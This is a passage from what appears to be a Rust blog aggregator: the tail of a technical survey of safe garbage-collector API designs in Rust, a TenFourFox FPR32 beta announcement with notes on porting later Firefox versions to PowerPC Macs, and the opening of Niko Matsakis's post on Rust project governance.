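    // and must not assume other GC'd objects are still alive.
    fn finalize(&self) {}
}

struct Traced; // pretend this came out of #[derive(Trace)]

impl Finalize for Traced {
    fn finalize(&self) {
        FINALIZED.fetch_add(1, Ordering::SeqCst);
    }
}

// generated by the derive; a user-written `impl Drop for Traced`
// would now be a duplicate-implementation error
impl Drop for Traced {
    fn drop(&mut self) {
        self.finalize();
    }
}
```

Because the derive owns the only Drop impl, the collector controls exactly when (and whether) finalization logic runs.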

How would you even garbage collect without a runtime?

In most garbage collected languages, there’s a runtime that controls all execution, knows about every variable in the program, and is able to pause execution to run the GC whenever it likes.

Rust has a minimal runtime and can’t do anything like this, especially not in a pluggable way your library can hook in to. For thread local GCs you basically have to write it such that GC operations (things like mutating a GC field; basically some subset of the APIs exposed by your GC library) are the only things that may trigger the garbage collector.

Concurrent GCs can trigger the GC on a separate thread but will typically need to pause other threads whenever these threads attempt to perform a GC operation that could potentially be invalidated by the running garbage collector.

While this may restrict the flexibility of the garbage collector itself, this is actually pretty good for us from the side of API design: the garbage collection phase can only happen in certain well-known moments of the code, which means we only need to make things safe across those boundaries. Many of the designs we shall look at build off of this observation.


Before getting into the actual examples of GC design, I want to point out some commonalities of design between all of them, especially around how they do tracing:


“Tracing” is the operation of traversing the graph of GC objects, starting from your roots and perusing their children, and their children’s children, and so on.

In Rust, the easiest way to implement this is via a custom derive:

// unsafe to implement by hand since you can get it wrong
unsafe trait Trace {
    fn trace(&mut self, gc_context: &mut GcContext);
}

#[derive(Trace)]
struct Foo {
    vec: Vec<Gc<Bar>>,
    extra_thing: Gc<Baz>,
    just_a_string: String
}
The custom derive of Trace basically just calls trace() on all the fields. Vec’s Trace implementation will be written to call trace() on all of its fields, and String’s Trace implementation will do nothing. Gc<T> will likely have a trace() that marks its reachability in the GcContext, or something similar.

This is a pretty standard pattern, and while the specifics of the Trace trait will typically vary, the general idea is roughly the same.
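To make the derive's behavior concrete, here is a toy expansion of what #[derive(Trace)] might generate for Foo above (GcContext here just counts visits, and Gc<T> is a stand-in; real crates differ in detail):

```rust
// toy context: a real one would carry mark bits, a worklist, etc.
struct GcContext {
    visited: usize,
}

unsafe trait Trace {
    fn trace(&mut self, gc_context: &mut GcContext);
}

struct Gc<T>(T); // stand-in for a real GC pointer

unsafe impl<T> Trace for Gc<T> {
    fn trace(&mut self, gc_context: &mut GcContext) {
        // a real Gc<T> would mark its heap cell here, then trace T
        gc_context.visited += 1;
    }
}

unsafe impl<T: Trace> Trace for Vec<T> {
    fn trace(&mut self, gc_context: &mut GcContext) {
        for item in self {
            item.trace(gc_context);
        }
    }
}

unsafe impl Trace for String {
    // no GC pointers inside a String: nothing to do
    fn trace(&mut self, _gc_context: &mut GcContext) {}
}

struct Bar;
struct Baz;

struct Foo {
    vec: Vec<Gc<Bar>>,
    extra_thing: Gc<Baz>,
    just_a_string: String,
}

// what the derive would generate: trace every field
unsafe impl Trace for Foo {
    fn trace(&mut self, gc_context: &mut GcContext) {
        self.vec.trace(gc_context);
        self.extra_thing.trace(gc_context);
        self.just_a_string.trace(gc_context);
    }
}
```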

I’m not going to get into the actual details of how mark-and-sweep algorithms work in this post; there are a lot of potential designs for them and they’re not that interesting from the point of view of designing a safe GC API in Rust. However, the general idea is to keep a queue of found objects, initially populated by the roots; trace them to find new objects and queue them up if they’ve not already been traced; then clean up any objects that were not found.
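The worklist idea can be sketched over a toy index-based heap (children[i] lists the objects that object i references; real collectors trace actual heap pointers, not Vec indices):

```rust
use std::collections::{HashSet, VecDeque};

// Mark phase: starting from the roots, find everything reachable.
fn mark(roots: &[usize], children: &[Vec<usize>]) -> HashSet<usize> {
    let mut marked: HashSet<usize> = roots.iter().copied().collect();
    let mut queue: VecDeque<usize> = roots.iter().copied().collect();
    while let Some(obj) = queue.pop_front() {
        for &child in &children[obj] {
            // queue each object the first time we see it
            if marked.insert(child) {
                queue.push_back(child);
            }
        }
    }
    // sweep phase (not shown): anything not in `marked` gets cleaned up
    marked
}
```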


Another commonality between these designs is that a Gc<T> is always potentially shared, and thus will need tight control over mutability to satisfy Rust’s ownership invariants. This is typically achieved by using interior mutability, much like how Rc<T> is almost always paired with RefCell<T> for mutation; however, some approaches (like that in josephine) do allow for mutability without runtime checking.


Some GCs are single-threaded, and some are multi-threaded. The single-threaded ones typically have a Gc<T> type that is not Send, so while you can set up multiple graphs of GC types on different threads, they’re essentially independent. Garbage collection only affects the thread it is being performed for; all other threads can continue unhindered.

Multithreaded GCs will have a Send Gc<T> type. Garbage collection will typically, but not always, block any thread which attempts to access data managed by the GC during that time. In some languages there are “stop the world” garbage collectors which block all threads at “safepoints” inserted by the compiler; Rust does not have the capability to insert such safepoints and blocking threads on GCs is done at the library level.

Most of the examples below are single-threaded, but their API design is not hard to extend towards a hypothetical multithreaded GC.


gc

The gc crate is one I wrote with Nika Layzell mostly as a fun exercise, to figure out if a safe GC API is possible. I’ve written about the design in depth before, but the essence of the design is that it does something similar to reference counting to keep track of roots, and forces all GC mutations to go through special GcCell types so that they can update the root count. Basically, a “root count” is updated whenever something becomes a root or stops being a root:

struct Foo {
    bar: GcCell<Option<Gc<Bar>>>
}

// this is a root (root count = 1)
let bar = Gc::new(Bar::new());
// this is also a root (root count = 1)
let foo = Gc::new(Foo::new());
// .borrow_mut()'s RAII guard unroots bar (sets its root count to 0)
*foo.bar.borrow_mut() = Some(bar);
// foo is still a root here, no call to .set()
let v = vec![foo];

// at destruction time, foo's root count is set to 0

The actual garbage collection phase will occur when certain GC operations are performed at a time when the heap is considered to have gotten reasonably large according to some heuristics.

While this is essentially “free” on reads, there is a fair amount of reference count traffic on any kind of write, which might not be desired; often the goal of using GCs is to avoid the performance characteristics of reference-counting-like patterns. Ultimately this is a hybrid approach that’s a mix of tracing and reference counting6.
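The root-count bookkeeping can be sketched as follows (GcBox and the root/unroot hooks are assumed names describing the general shape, not the gc crate's actual internals):

```rust
use std::cell::Cell;

// Each GC heap cell tracks how many stack references ("roots") point at it.
struct GcBox<T> {
    roots: Cell<usize>,
    value: T,
}

impl<T> GcBox<T> {
    fn new(value: T) -> Self {
        // a freshly created handle starts out rooted on the stack
        GcBox { roots: Cell::new(1), value }
    }
    // called when a handle is copied back onto the stack
    fn root(&self) {
        self.roots.set(self.roots.get() + 1);
    }
    // called by the write guard when a handle moves into the heap
    fn unroot(&self) {
        self.roots.set(self.roots.get() - 1);
    }
    fn is_root(&self) -> bool {
        self.roots.get() > 0
    }
}
```

At collection time, every box with a nonzero root count is a starting point for tracing.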

gc is useful as a general-purpose GC if you just want a couple of things to participate in cycles without having to think about it too much. The general design can apply to a specialized GC integrating with another language runtime since it provides a clear way to keep track of roots; but it may not necessarily have the desired performance characteristics.

Servo’s DOM integration

Servo is a browser engine in Rust that I used to work on full time. As mentioned earlier, browser engines typically implement a lot of their DOM types in native (i.e. Rust or C++, not JS) code, so for example Node is a pure Rust object, and it contains direct references to its children so Rust code can do things like traverse the tree without having to go back and forth between JS and Rust.

Servo’s model is a little weird: roots are a different type, and lints enforce that unrooted heap references are never placed on the stack:

#[dom_struct] // this is #[derive(JSTraceable)] plus some markers for lints
pub struct Node {
    // the parent type, for inheritance
    eventtarget: EventTarget,
    // in the actual code this is a different helper type that combines
    // the RefCell, Option, and Dom, but i've simplified it to use
    // stdlib types for this example
    prev_sibling: RefCell<Option<Dom<Node>>>,
    next_sibling: RefCell<Option<Dom<Node>>>,
    // ...
}

impl Node {
    fn frob_next_sibling(&self) {
        // fields can be accessed as borrows without any rooting
        if let Some(next) = self.next_sibling.borrow().as_ref() {
            next.frob();
        }
    }

    fn get_next_sibling(&self) -> Option<DomRoot<Node>> {
        // but you need to root things for them to escape the borrow
        // .root() turns Dom<T> into DomRoot<T>
        self.next_sibling.borrow().as_ref().map(|x| x.root())
    }

    fn illegal(&self) {
        // this line of code would get linted by a custom lint called unrooted_must_root
        // (which works somewhat similarly to the must_use stuff that Rust does)
        let ohno: Dom<Node> = self.next_sibling.borrow_mut().take().unwrap();
    }
}

Dom<T> is basically a smart pointer that behaves like &T but without a lifetime, whereas DomRoot<T> has the additional behavior of rooting on creation (and unrooting on Drop). The custom lint plugin essentially enforces that Dom<T>, and any DOM structs (tagged with #[dom_struct]) are never accessible on the stack aside from through DomRoot<T> or &T.
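The root-on-create / unroot-on-drop behavior that DomRoot<T> adds over Dom<T> can be modeled with a toy thread-local root stack (a sketch only; Servo's real rooting machinery talks to SpiderMonkey):

```rust
use std::cell::RefCell;

thread_local! {
    // the collector would scan this stack to find its roots
    static ROOT_STACK: RefCell<Vec<*const ()>> = RefCell::new(Vec::new());
}

fn root_count() -> usize {
    ROOT_STACK.with(|r| r.borrow().len())
}

struct DomRoot<T> {
    ptr: *const T,
}

impl<T> DomRoot<T> {
    // rooting happens on creation
    fn new(ptr: *const T) -> Self {
        ROOT_STACK.with(|r| r.borrow_mut().push(ptr as *const ()));
        DomRoot { ptr }
    }
}

impl<T> Drop for DomRoot<T> {
    // roots live on the stack, so they unroot in LIFO order
    fn drop(&mut self) {
        let popped = ROOT_STACK.with(|r| r.borrow_mut().pop());
        debug_assert_eq!(popped, Some(self.ptr as *const ()));
    }
}
```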

I wouldn’t recommend this approach; it works okay but we’ve wanted to move off of it for a while because it relies on custom plugin lints for soundness. But it’s worth mentioning for completeness.

Josephine (Servo’s experimental GC plans)

Given that Servo’s existing GC solution depends on plugging in to the compiler to do additional static analysis, we wanted something better. So Alan designed Josephine (“JS affine”), which uses Rust’s affine types and borrowing in a cleaner way to provide a safe GC system.

Josephine is explicitly designed for Servo’s use case and as such does a lot of neat things around “compartments” and such that are probably irrelevant unless you specifically wish for your GC to integrate with a JS engine.

I mentioned earlier that the fact that the garbage collection phase can only happen in certain well-known moments of the code actually can make things easier for GC design, and Josephine is an example of this.

Josephine has a “JS context”, which is to be passed around everywhere and essentially represents the GC itself. When doing operations which may trigger a GC, you have to borrow the context mutably, whereas when accessing heap objects you need to borrow the context immutably. You can root heap objects to remove this requirement:

// cx is a `JSContext`, `node` is a `JSManaged<'a, C, Node>`
// assuming next_sibling and prev_sibling are not Options for simplicity

// borrows cx for `'b`
let next_sibling: &'b Node = node.next_sibling.borrow(cx);
println!("Name: {:?}", next_sibling.name);
// illegal, because cx is immutably borrowed by next_sibling
// node.prev_sibling.borrow_mut(cx).frob();

// read from next_sibling to ensure it lives this long
println!("{:?}", next_sibling.name);

let ref mut root = cx.new_root();
// no longer needs to borrow cx, borrows root for 'root instead
let next_sibling: JSManaged<'root, C, Node> = node.next_sibling.in_root(root);
// now it's fine, no outstanding borrows of `cx`

// read from next_sibling to ensure it lives this long
println!("{:?}", next_sibling.name);

new_root() creates a new root, and in_root ties the lifetime of a JS managed type to the root instead of to the JSContext borrow, releasing the borrow of the JSContext and allowing it to be borrowed mutably in future .borrow_mut() calls.

Note that .borrow() and .borrow_mut() here do not have runtime borrow-checking cost despite their similarities to RefCell::borrow(); instead they do some lifetime juggling to make things safe. Creating roots typically does have runtime cost. Sometimes you may need to use RefCell<T> for the same reason it’s used in Rc, but mostly only for non-GCd fields.
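The context-borrow discipline can be modeled in miniature (JSContext and Handle here are stand-ins with a one-slot "heap"; josephine's real API also tracks compartments and real GC storage). Reads tie their result's lifetime to an immutable borrow of the context, while mutation requires &mut, so the borrow checker forbids mutating while reads are outstanding:

```rust
struct JSContext {
    slot: String, // toy one-slot "heap"
}

#[derive(Clone, Copy)]
struct Handle; // stands in for JSManaged<'a, C, T>

impl Handle {
    // reading ties the result's lifetime to an immutable borrow of cx
    fn borrow<'b>(self, cx: &'b JSContext) -> &'b String {
        &cx.slot
    }
    // mutation needs &mut JSContext, so no reads can be outstanding
    fn borrow_mut<'b>(self, cx: &'b mut JSContext) -> &'b mut String {
        &mut cx.slot
    }
}
```

Holding the &'b String returned by borrow() while calling borrow_mut() is a compile error, which is exactly the guarantee the real API relies on.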

Custom types are typically defined in two parts as so:

#[derive(Copy, Clone, Debug, Eq, PartialEq, JSTraceable, JSLifetime, JSCompartmental)]
pub struct Element<'a, C> (pub JSManaged<'a, C, NativeElement<'a, C>>);

#[derive(JSTraceable, JSLifetime, JSCompartmental)]
pub struct NativeElement<'a, C> {
    name: JSString<'a, C>,
    parent: Option<Element<'a, C>>,
    children: Vec<Element<'a, C>>,
}

where Element<'a> is a convenient copyable reference that is to be used inside other GC types, and NativeElement<'a> is its backing storage. The C parameter has to do with compartments and can be ignored for now.

A neat thing worth pointing out is that there’s no runtime borrow checking necessary for manipulating other GC references, even though roots let you hold multiple references to the same object!

let ref mut parent_root = cx.new_root();
let parent = element.borrow(cx).parent.in_root(parent_root);
let ref mut child_root = cx.new_root();

// could potentially be a second reference to `element` if it was
// the first child
let first_child = parent.children[0].in_root(child_root);

// this is okay, even though we hold a reference to `parent`
// via element.parent, because we have rooted that reference so it's
// now independent of whether `element.parent` changes!
first_child.borrow_mut(cx).parent = None;

Essentially, when mutating a field, you have to obtain mutable access to the context, so there will not be any references to the field itself still around (e.g. element.borrow(cx).parent), only to the GC’d data within it, so you can change what a field references without invalidating other references to the contents of what the field references. This is a pretty cool trick that enables GC without runtime-checked interior mutability, which is relatively rare in such designs.

Unfinished design for a builtin Rust GC

For a while a couple of us worked on a way to make Rust itself extensible with a pluggable GC, using LLVM stack map support for finding roots. After all, if we know which types are GC-ish, we can include metadata on how to find roots for each function, similar to how Rust functions currently contain unwinding hooks to enable cleanly running destructors during a panic.

We never got around to figuring out a complete design, but you can find more information on what we figured out in my and Felix’s posts on this subject. Essentially, it involved a Trace trait with more generic trace methods, an auto-implemented Root trait that works similar to Send, and compiler machinery to keep track of which Root types are on the stack.

This is probably not too useful for people attempting to implement a GC, but I’m mentioning it for completeness’ sake.

Note that pre-1.0 Rust did have a builtin GC (@T, known as “managed pointers”), but IIRC in practice the cycle-management parts were not ever implemented so it behaved exactly like Rc<T>. I believe it was intended to have a cycle collector (I’ll talk more about that in the next section).

bacon-rajan-cc (and cycle collectors in general)

Nick Fitzgerald wrote bacon-rajan-cc to implement “Concurrent Cycle Collection in Reference Counted Systems” by David F. Bacon and V.T. Rajan.

This is what is colloquially called a cycle collector; a kind of garbage collector which is essentially “what if we took Rc<T> but made it detect cycles”. Some people do not consider these to be tracing garbage collectors, but they have a lot of similar characteristics (and they do still “trace” through types). They’re often categorized as “hybrid” approaches, much like gc.

The idea is that you don’t actually need to know what the roots are if you’re maintaining reference counts: if a heap object has a reference count that is more than the number of heap objects referencing it, it must be a root. In practice it’s pretty inefficient to traverse the entire heap, so optimizations are applied, often by assigning different “colors” to nodes, and by only looking at the set of objects that have recently had their reference counts decremented.

A crucial observation here is that if you only focus on potential garbage, you can shift your definition of “root” a bit: when looking for cycles, you don’t need to look for references from the stack; you can be satisfied with references from any part of the heap you know for a fact is reachable from things which are not potential garbage.

A neat property of cycle collectors is while mark and sweep tracing GCs have their performance scale by the size of the heap as a whole, cycle collectors scale by the size of the actual garbage you have 7. There are of course other tradeoffs: deallocation is often cheaper or “free” in tracing GCs (amortizing those costs by doing it during the sweep phase) whereas cycle collectors have the constant allocator traffic involved in cleaning up objects when refcounts reach zero.

The way bacon-rajan-cc works is that every time a reference count is decremented, the object is added to a list of “potential cycle roots”, unless the reference count is decremented to 0 (in which case the object is immediately cleaned up, just like Rc). It then traces through this list; decrementing refcounts for every reference it follows, and cleaning up any elements that reach refcount 0. It then traverses this list again and reincrements refcounts for each reference it follows, to restore the original refcount. This basically treats any element not reachable from this “potential cycle root” list as “not garbage”, and doesn’t bother to visit it.
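The core "trial deletion" step can be sketched in simplified form (illustrative, index-based; bacon-rajan-cc's real algorithm works on Cc<T> pointers, re-increments counts afterwards, and colors nodes): within a candidate subgraph, subtract every internal reference; anything left at count zero is kept alive only by the cycle and is garbage.

```rust
use std::collections::HashMap;

fn cyclic_garbage(
    refcounts: &HashMap<usize, usize>,
    edges: &[(usize, usize)], // (from, to) references inside the subgraph
) -> Vec<usize> {
    let mut counts = refcounts.clone();
    // subtract references that come from within the candidate subgraph
    for &(_, to) in edges {
        if let Some(c) = counts.get_mut(&to) {
            *c = c.saturating_sub(1);
        }
    }
    // nodes with no remaining (external) references are cyclic garbage
    let mut garbage: Vec<usize> = counts
        .into_iter()
        .filter(|&(_, c)| c == 0)
        .map(|(n, _)| n)
        .collect();
    garbage.sort();
    garbage
}
```

For a two-node cycle with no outside references, both nodes drop to zero and are collected, while a node that also has an external reference survives.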

Cycle collectors require tighter control over the garbage collection algorithm, and have differing performance characteristics, so they may not necessarily be suitable for all use cases for GC integration in Rust, but it’s definitely worth considering!


cell-gc

Jason Orendorff’s cell-gc crate is interesting; it has a concept of “heap sessions”. Here’s a modified example from the readme:

use cell_gc::Heap;

// implements IntoHeap, and also generates an IntListRef type and accessors
#[derive(IntoHeap)]
struct IntList<'h> {
    head: i64,
    tail: Option<IntListRef<'h>>
}

fn main() {
    // Create a heap (you'll only do this once in your whole program)
    let mut heap = Heap::new();

    heap.enter(|hs| {
        // Allocate an object (returns an IntListRef)
        let obj1 = hs.alloc(IntList { head: 17, tail: None });
        assert_eq!(obj1.head(), 17);
        assert_eq!(obj1.tail(), None);

        // Allocate another object
        let obj2 = hs.alloc(IntList { head: 33, tail: Some(obj1) });
        assert_eq!(obj2.head(), 33);
        assert_eq!(obj2.tail().unwrap().head(), 17);

        // mutate `tail` via an autogenerated setter
        obj2.set_tail(None);
    });
}

All mutation goes through autogenerated accessors, so the crate has a little more control over traffic through the GC. These accessors help track roots via a scheme similar to what gc does; where there’s an IntoHeap trait used for modifying root refcounts when a reference is put into and taken out of the heap via accessors.

Heap sessions allow for the heap to be moved around, even sent to other threads, and their lifetime prevents heap objects from being mixed between sessions. This uses a concept called generativity; you can read more about generativity in “You Can’t Spell Trust Without Rust” ch 6.3, by Alexis Beingessner, or by looking at the indexing crate.

Interlude: The similarities between async and GCs

The next two examples use machinery from Rust’s async functionality despite having nothing to do with async I/O, and I think it’s important to talk about why that should make sense. I’ve tweeted about this before: Catherine West and I figured this out when we were talking about her GC idea based on async.

You can see some of this correspondence in Go: Go is a language that has both garbage collection and async I/O, and both of these use the same “safepoints” for yielding to the garbage collector or the scheduler. In Go, the compiler needs to automatically insert code that checks the “pulse” of the heap every now and then, and potentially runs garbage collection. It also needs to automatically insert code that can tell the scheduler “hey now is a safe time to interrupt me if a different goroutine wishes to run”. These are very similar in principle – they’re both essentially places where the compiler is inserting “it is okay to interrupt me now” checks, sometimes called “interruption points” or “yield points”.

Now, Rust’s compiler does not automatically insert interruption points. However, the design of async in Rust is essentially a way of adding explicit interruption points to Rust. foo().await in Rust is a way of running foo() and expecting that the scheduler may interrupt the code in between. The design of Future and Pin<P> come out of making this safe and pleasant to work with.

As we shall see, this same machinery can be used for creating safe interruption points for GCs in Rust.


shifgrethor

shifgrethor is an experiment by Saoirse to try and build a GC that uses Pin<P> for managing roots. They’ve written extensively on the design of shifgrethor on their blog. In particular, the post on rooting goes through how rooting works.

The basic design is that there’s a Root<'root> type that contains a Pin<P>, which can be immovably tied to a stack frame using the same idea behind pin-utils’ pin_mut!() macro:

letroot!(root); // pins a Root<'root> to this stack frame
let gc: Gc<'root, Foo> = root.gc(Foo::new());

The fact that root is immovable allows for it to be treated as a true marker for the stack frame over anything else. The list of rooted types can be neatly stored in an ordered stack-like vector in the GC implementation, popping when individual roots go out of scope.

If you wish to return a rooted object from a function, the function needs to accept a Root<'root>:

fn new<'root>(root: Root<'root>) -> Gc<'root, Self> {
    root.gc(Self {
        // ...
    })
}

All GC’d types have a 'root lifetime of the root they trace back to, and are declared with a custom derive:

#[derive(GC)]
struct Foo<'root> {
    #[gc] bar: GcStore<'root, Bar>,
}

GcStore is a way to have fields use the rooting of their parent. Normally, if you wanted to put Gc<'root2, Bar<'root2>> inside Foo<'root1> you would not be able to because the lifetimes derive from different roots. GcStore, along with autogenerated accessors from #[derive(GC)], will set Bar’s lifetime to be the same as Foo when you attempt to stick it inside Foo.

This design is somewhat similar to that of Servo where there’s a pair of types, one that lets us refer to GC types on the stack, and one that lets GC types refer to each other on the heap, but it uses Pin<P> instead of a lint to enforce this safely, which is way nicer. Root<'root> and GcStore do a bunch of lifetime tweaking that’s reminiscent of Josephine’s rooting system, however there’s no need for an &mut JsContext type that needs to be passed around everywhere.


gc-arena

gc-arena is Catherine West’s experimental GC design for her Lua VM, luster.

The gc-arena crate forces all GC-manipulating code to go within arena.mutate() calls, between which garbage collection may occur.

struct TestRoot<'gc> {
    number: Gc<'gc, i32>,
    many_numbers: GcCell<Vec<Gc<'gc, i32>>>,
}

make_arena!(TestArena, TestRoot);

let mut arena = TestArena::new(ArenaParameters::default(), |mc| TestRoot {
    number: Gc::allocate(mc, 42),
    many_numbers: GcCell::allocate(mc, Vec::new()),
});

arena.mutate(|mc, root| {
    assert_eq!(*((*root).number), 42);
    root.many_numbers.write(mc).push(Gc::allocate(mc, 0));
});

Mutation is done with GcCell, basically a fancier version of Gc<RefCell<T>>. All GC operations require a MutationContext (mc), which is only available within arena.mutate().

Only the arena root may survive between mutate() calls, and garbage collection does not happen during .mutate(), so rooting is easy – just follow the arena root. This crate allows for multiple GCs to coexist with separate heaps, and, similarly to cell-gc, it uses generativity to enforce that the heaps do not get mixed.

So far this is mostly like other arena-based systems, but with a GC.

The really cool part of the design is the gc-sequence crate, which essentially builds a Future-like API (using a Sequence trait) on top of gc-arena that can potentially make this very pleasant to use. Here’s a modified example from a test:

struct TestRoot<'gc> {
    test: Gc<'gc, i32>,
}

make_sequencable_arena!(test_sequencer, TestRoot);
use test_sequencer::Arena as TestArena;

let arena = TestArena::new(ArenaParameters::default(), |mc| TestRoot {
    test: Gc::allocate(mc, 42),
});

let mut sequence = arena.sequence(|root| {
    sequence::from_fn_with(root.test, |_, test| {
        if *test == 42 {
            Ok(*test + 10)
        } else {
            Err("will not be generated")
        }
    })
    .and_then(|_, r| Ok(r + 12))
    .and_chain(|_, r| Ok(sequence::ok(r - 10)))
    .then(|_, res| res.expect("should not be error"))
    .chain(|_, r| sequence::done(r + 10))
    .map(|r| sequence::done(r - 60))
});

loop {
    match sequence.step() {
        Ok((_, output)) => {
            assert_eq!(output, 4);
            break;
        }
        Err(s) => sequence = s,
    }
}
This is very similar to chained callback futures code; if it could use the Future trait, it would be able to make use of async to convert this callback-heavy code into sequential code with interrupt points using await. There were design constraints making Future not workable for this use case, though if Rust ever gets generators this would work well, and it’s quite possible that another GC with a similar design could be written using async/await and Future.

Essentially, this paints a picture of an entire space of Rust GC design where GC mutations are performed using await (or yield if we ever get generators), and garbage collection can occur during those yield points, in a way that’s highly reminiscent of Go’s design.

Moving forward

As is hopefully obvious, the space of safe GC design in Rust is quite rich and has a lot of interesting ideas. I’m really excited to see what folks come up with here!

If you’re interested in reading more about GCs in general, “A Unified Theory of Garbage Collection” by Bacon et al and the GC Handbook are great reads.

Thanks to Andi McClure, Jason Orendorff, Nick Fitzgerald, and Nika Layzell for providing feedback on drafts of this blog post.

  1. I’m also going to completely ignore the field of conservative stack-scanning tracing GCs where you figure out your roots by looking at all the stack memory and considering anything with a remotely heap-object-like bit pattern to be a root. These are interesting, but can’t really be made 100% safe in the way Rust wants them to be unless you scan the heap as well. 

  2. Which currently does not have support for concurrent garbage collection, but it could be added. 

  3. Some JNI-using APIs are also forced to have explicit rooting APIs to give access to things like raw buffers. 

  4. In general, finalizers in GCs are hard to implement soundly in any language, not just Rust, but Rust can sometimes be a bit more annoying about it. 

  5. Spoiler: This is actually possible in Rust, and we’ll get into it further in this post! 

  6. Such hybrid approaches are common in high performance GCs; “A Unified Theory of Garbage Collection” by Bacon et al. covers a lot of the breadth of these approaches. 

  7. Firefox’s DOM actually uses a mark & sweep tracing GC mixed with a cycle collector for this reason. The DOM types themselves are cycle collected, but JavaScript objects are managed by the Spidermonkey GC. Since some DOM types may contain references to arbitrary JS types (e.g. ones that store callbacks) there’s a fair amount of work required to break cycles manually in some cases, but it has performance benefits since the vast majority of DOM objects either never become garbage or become garbage by having a couple non-cycle-participating references get released. 

Cameron KaiserTenFourFox FPR32b1 available

I decided not to post this on April Fools Day since a lot of people were hoping the last post was a mistimed April Fools prank, and it wasn't. For one thing, I've never worked that hard on an April Fools joke, even the time when I changed the printer READY messages all over campus to say INSERT FIVE CENTS.

Anyway, the beta for the final TenFourFox Feature Parity Release, FPR32, is now available (downloads, hashes, release notes). This release adds another special preference dialogue for auto reader view, allowing you to automatically jump to reader view for subpages or all pages of domains you enter. I also updated Readability, the underlying Reader View library, to the current tip and also refreshed the ATSUI font blocklist. It will become final on or about April 20 parallel to Firefox 88.

I received lots of kind messages which I have been replying to. Many people appreciated that they could use their hardware for longer, even if they themselves are no longer using their Power Macs, and I even heard about an iMac G4 that is currently a TenFourFox-powered kiosk. I'm willing to bet there are actually a number of these systems hauled out of the closet easily serving such purposes by displaying a ticker or dashboard that can be tweaked to render quickly.

Don't forget, though, that even after September 7 I will still make intermittent updates (primarily security-based) for my own use which will be public and you can use them too. However, as I mentioned, you'll need to build the browser yourself, and since it will only be on a rolling basis (I won't be doing specific versions or tags), you can decide how often you want to update your own local copy. I'll make a note here on the blog when I've done a new batch so that your feedreader can alert you if you aren't watching the Github repository already. The first such batch is a near certainty since it will be me changing the certificate roots to 91ESR.

If you come up with simpler or better build instructions, I'm all ears.

I'm also willing to point people to third-party builds. If you're able to do it and want to take on the task, and don't mind others downloading it, post in the comments. You declare how often you want to do it and which set of systems you want to do it for. The more builders the merrier so that the load can be shared and people can specialize in the systems they most care about.

As a last comment, a few people have asked what it would take to get later versions (52ESR, etc.) to run on Power Macs. Fine, here's a summarized to-do list. None of them are (probably) technically impossible; the real issue is the amount of time required and the ongoing burden needed, plus any unexpected regressions you'd incur. (See also the flap over the sudden Rust requirement for the Python cryptography library, an analogous situation which broke a number of other platforms of similar vintage.)

  • Upgrade gcc and validate it.
  • Transplant the 32-bit PowerPC JIT to 52's JavaScript. This isn't automatic because you would need to add any new code to the backend required by Ion, and there are some hacks in the source to fix various assumptions SpiderMonkey makes that have to be rechecked and carried forward. There are also some endian fixes. You could get around this by making it interpreter-only, but since much of the browser itself is written in JavaScript, everything will slow down, not just web pages. This task is additionally complicated by our post-45 changes which would need to be undone.
  • Transplant the local Cocoa widget changes and merge them with any additional OS support Mozilla added. There are a lot of these patches; some portions were completely rewritten for 10.4 or use old code I dragged along from version to version. A couple people proposed an X11-only version to get around this too. You should be able to do this, and it would probably work, but the code needs some adjustment to deal with the fact it's running on Mac OS X but not with a Cocoa widget system. There are a number of places you would need to manually patch, though this is mostly tedium and not terribly complex.
  • The 2D drawing backend changed from CoreGraphics to Skia for technical reasons. Unfortunately, Skia at the time had a lot of problems on big endian and didn't compile properly with 10.4. The former problem might have since been fixed upstream but the latter almost certainly wouldn't have been or would now be worse. You can get around this by using Cairo, but our CG backend was heavily customized, and you will take an additional performance hit on what was probably TenFourFox's worst performing section to begin with since we have no GPU acceleration. It may also be possible to patch the old CG backend back in but you would need to write any additional glue to deal with the higher-level API changes.
  • The ICU library required by JavaScript lacked Mozilla build system support for big-endian for a very long time. This was finally fixed in Firefox 80; you would need to backport this.
And then, assuming you want to go post-Firefox 54, there's Rust. Rust is not compatible with 32-bit PowerPC on OS X (it does work on other 32-bit PowerPC operating systems, but those don't run TenFourFox). Besides having to do any adjustments to Rust to emit code compliant with the PowerOpen ABI used by 32-bit PowerPC OS X, you will also have issues with any crates or code that require thread-local storage; OS X didn't support this until 10.7. There may be ways to emulate it and you get to figure those out. On top of that is the need for LLVM: David Fang struggled for years trying to get early versions to work on Tiger, and even MacPorts currently shows llvm-9 on 10.6 as "red", which does not bode well for 10.5 or 10.4. The issue seems to be missing dependencies and you get to figure those out too. I'm just not willing to maintain an entire compiler toolchain and infrastructure on top of maintaining a browser.

If you think I'm wrong about all this, rather than argue with me in the comments, today's your chance to prove it :)

Niko MatsakisMy “shiny future”

I’ve been working on the Rust project for just about ten years. The language has evolved radically in that time, and so has the project governance. When I first started, for example, we communicated primarily over the rust-dev mailing list and the #rust IRC channel. I distinctly remember coming into the Mozilla offices1 one day and brson excitedly telling me, “There were almost a dozen people on the #rust IRC channel last night! Just chatting! About Rust!” It’s funny to think about that now, given the scale Rust is operating at today.

Scaling the project governance

Scaling the governance of the project to keep up with its growing popularity has been a constant theme. The first step was when we created a core team (initially pcwalton, brson, and I) to make decisions. We needed some kind of clear decision makers, but we didn’t want to set up a single person as “BDFL”. We also wanted a mechanism that would allow us to include non-Mozilla employees as equals.2

Having a core team helped us move faster for a time, but we soon found that the range of RFCs being considered was too much for one team. We needed a way to expand the set of decision makers to include focused expertise from each area. To address these problems, aturon and I created RFC 1068, which expanded from a single “core team” into many Rust teams, each focused on accepting RFCs and managing a particular area.

As written, RFC 1068 described a central technical role for the core team3, but it quickly became clear that this wasn’t necessary. In fact, it was a kind of hindrance, since it introduced unnecessary bottlenecks. In practice, the Rust teams operated quite independently from one another. This independence enabled us to move rapidly on improving Rust; the RFC process – which we had introduced in 20144 – provided the “checks and balances” that kept teams on track.5 As the project grew further, new teams like the release team were created to address dedicated needs.

The teams were scaling well, but there was still a bottleneck: most people who contributed to Rust were still doing so as volunteers, which ultimately limits the amount of time people can put in. This was a hard nut to crack6, but we’ve finally seen progress this year, as more and more companies have been employing people to contribute to Rust. Many of them are forming entire teams for that purpose – including AWS, where I am working now. And of course I would be remiss not to mention the launch of the Rust Foundation itself, which gives Rust a legal entity of its own and creates a forum where companies can pool resources to help Rust grow.

My own role

My own trajectory through Rust governance has kind of mirrored the growth of the project. I was an initial member of the core team, as I said, and after we landed RFC 1068 I became the lead of the compiler and language design teams. I’ve been wearing these three hats until very recently.

